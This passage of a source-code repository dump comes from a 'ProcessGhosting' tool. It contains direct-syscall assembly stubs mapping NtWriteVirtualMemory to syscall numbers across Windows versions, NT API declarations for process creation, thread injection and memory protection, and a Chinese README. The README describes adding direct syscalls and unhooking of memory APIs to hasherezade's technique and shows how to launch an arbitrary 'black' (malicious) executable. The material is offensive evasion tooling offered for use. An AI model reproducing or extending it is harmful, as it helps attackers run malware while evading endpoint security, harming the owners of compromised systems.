424 | 	je  NtWriteVirtualMemory_SystemCall_10_0_15063
425 | 	cmp word ptr [rax+120h], 16299
426 | 	je  NtWriteVirtualMemory_SystemCall_10_0_16299
427 | 	cmp word ptr [rax+120h], 17134
428 | 	je  NtWriteVirtualMemory_SystemCall_10_0_17134
429 | 	cmp word ptr [rax+120h], 17763
430 | 	je  NtWriteVirtualMemory_SystemCall_10_0_17763
431 | 	cmp word ptr [rax+120h], 18362
432 | 	je  NtWriteVirtualMemory_SystemCall_10_0_18362
433 | 	cmp word ptr [rax+120h], 18363
434 | 	je  NtWriteVirtualMemory_SystemCall_10_0_18363
435 | 	cmp word ptr [rax+120h], 19041
436 | 	je  NtWriteVirtualMemory_SystemCall_10_0_19041
437 | 	cmp word ptr [rax+120h], 19042
438 | 	je  NtWriteVirtualMemory_SystemCall_10_0_19042
439 | 	cmp word ptr [rax+120h], 19043
440 | 	je  NtWriteVirtualMemory_SystemCall_10_0_19043
441 | 	jmp NtWriteVirtualMemory_SystemCall_Unknown
442 | NtWriteVirtualMemory_SystemCall_5_X_XXXX:          ; Windows XP and Server 2003
443 | 	mov eax, 0037h
444 | 	jmp NtWriteVirtualMemory_Epilogue
445 | NtWriteVirtualMemory_SystemCall_6_0_6000:          ; Windows Vista SP0
446 | 	mov eax, 0037h
447 | 	jmp NtWriteVirtualMemory_Epilogue
448 | NtWriteVirtualMemory_SystemCall_6_0_6001:          ; Windows Vista SP1 and Server 2008 SP0
449 | 	mov eax, 0037h
450 | 	jmp NtWriteVirtualMemory_Epilogue
451 | NtWriteVirtualMemory_SystemCall_6_0_6002:          ; Windows Vista SP2 and Server 2008 SP2
452 | 	mov eax, 0037h
453 | 	jmp NtWriteVirtualMemory_Epilogue
454 | NtWriteVirtualMemory_SystemCall_6_1_7600:          ; Windows 7 SP0
455 | 	mov eax, 0037h
456 | 	jmp NtWriteVirtualMemory_Epilogue
457 | NtWriteVirtualMemory_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
458 | 	mov eax, 0037h
459 | 	jmp NtWriteVirtualMemory_Epilogue
460 | NtWriteVirtualMemory_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
461 | 	mov eax, 0038h
462 | 	jmp NtWriteVirtualMemory_Epilogue
463 | NtWriteVirtualMemory_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
464 | 	mov eax, 0039h
465 | 	jmp NtWriteVirtualMemory_Epilogue
466 | NtWriteVirtualMemory_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
467 | 	mov eax, 003ah
468 | 	jmp NtWriteVirtualMemory_Epilogue
469 | NtWriteVirtualMemory_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
470 | 	mov eax, 003ah
471 | 	jmp NtWriteVirtualMemory_Epilogue
472 | NtWriteVirtualMemory_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
473 | 	mov eax, 003ah
474 | 	jmp NtWriteVirtualMemory_Epilogue
475 | NtWriteVirtualMemory_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
476 | 	mov eax, 003ah
477 | 	jmp NtWriteVirtualMemory_Epilogue
478 | NtWriteVirtualMemory_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
479 | 	mov eax, 003ah
480 | 	jmp NtWriteVirtualMemory_Epilogue
481 | NtWriteVirtualMemory_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
482 | 	mov eax, 003ah
483 | 	jmp NtWriteVirtualMemory_Epilogue
484 | NtWriteVirtualMemory_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
485 | 	mov eax, 003ah
486 | 	jmp NtWriteVirtualMemory_Epilogue
487 | NtWriteVirtualMemory_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
488 | 	mov eax, 003ah
489 | 	jmp NtWriteVirtualMemory_Epilogue
490 | NtWriteVirtualMemory_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
491 | 	mov eax, 003ah
492 | 	jmp NtWriteVirtualMemory_Epilogue
493 | NtWriteVirtualMemory_SystemCall_10_0_19041:        ; Windows 10.0.19041 (2004)
494 | 	mov eax, 003ah
495 | 	jmp NtWriteVirtualMemory_Epilogue
496 | NtWriteVirtualMemory_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
497 | 	mov eax, 003ah
498 | 	jmp NtWriteVirtualMemory_Epilogue
499 | NtWriteVirtualMemory_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
500 | 	mov eax, 003ah
501 | 	jmp NtWriteVirtualMemory_Epilogue
502 | NtWriteVirtualMemory_SystemCall_Unknown:           ; Unknown/unsupported version.
503 | 	ret
504 | NtWriteVirtualMemory_Epilogue:
505 | 	mov r10, rcx
506 | 	syscall
507 | 	ret
508 | NtWriteVirtualMemory ENDP
509 | 
510 | end


--------------------------------------------------------------------------------
/ProcessGhost/syscall.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <Windows.h>
 4 | #include "ntddk.h"
 5 | typedef struct _PS_ATTRIBUTE
 6 | {
 7 | 	ULONG  Attribute;
 8 | 	SIZE_T Size;
 9 | 	union
10 | 	{
11 | 		ULONG Value;
12 | 		PVOID ValuePtr;
13 | 	} u1;
14 | 	PSIZE_T ReturnLength;
15 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE;
16 | 
17 | 
18 | typedef struct _PS_ATTRIBUTE_LIST
19 | {
20 | 	SIZE_T       TotalLength;
21 | 	PS_ATTRIBUTE Attributes[1];
22 | } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
23 | 
24 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
25 | 	IN HANDLE ProcessHandle,
26 | 	IN OUT PVOID * BaseAddress,
27 | 	IN OUT PSIZE_T RegionSize,
28 | 	IN ULONG NewProtect,
29 | 	OUT PULONG OldProtect);
30 | 
31 | EXTERN_C NTSTATUS NtCreateThreadEx(
32 | 	OUT PHANDLE ThreadHandle,
33 | 	IN ACCESS_MASK DesiredAccess,
34 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
35 | 	IN HANDLE ProcessHandle,
36 | 	IN PVOID StartRoutine,
37 | 	IN PVOID Argument OPTIONAL,
38 | 	IN ULONG CreateFlags,
39 | 	IN SIZE_T ZeroBits,
40 | 	IN SIZE_T StackSize,
41 | 	IN SIZE_T MaximumStackSize,
42 | 	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
43 | 
44 | EXTERN_C NTSTATUS NtWriteVirtualMemory(
45 | 	IN HANDLE ProcessHandle,
46 | 	IN PVOID BaseAddress,
47 | 	IN PVOID Buffer,
48 | 	IN SIZE_T NumberOfBytesToWrite,
49 | 	OUT PSIZE_T NumberOfBytesWritten OPTIONAL);
50 | 
51 | EXTERN_C NTSTATUS NtCreateProcessEx(
52 | 	OUT PHANDLE ProcessHandle,
53 | 	IN ACCESS_MASK DesiredAccess,
54 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
55 | 	IN HANDLE ParentProcess,
56 | 	IN ULONG Flags,
57 | 	IN HANDLE SectionHandle OPTIONAL,
58 | 	IN HANDLE DebugPort OPTIONAL,
59 | 	IN HANDLE ExceptionPort OPTIONAL,
60 | 	IN ULONG JobMemberLevel);
61 | 
62 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ProcessGhosting
2 | 本项目是来自hasherezade，并在hasherezade基础上对关键函数进行systemcall，对内存操作api进行unhook。
3 | ```
4 | 使用方法：
5 | processghost.exe blackexePath
6 | 
7 | ```
8 | 具体的技术详解请查看：https://mp.weixin.qq.com/s/HE0Re6RZ0wojTwPnHjeF3Q
9 | 


--------------------------------------------------------------------------------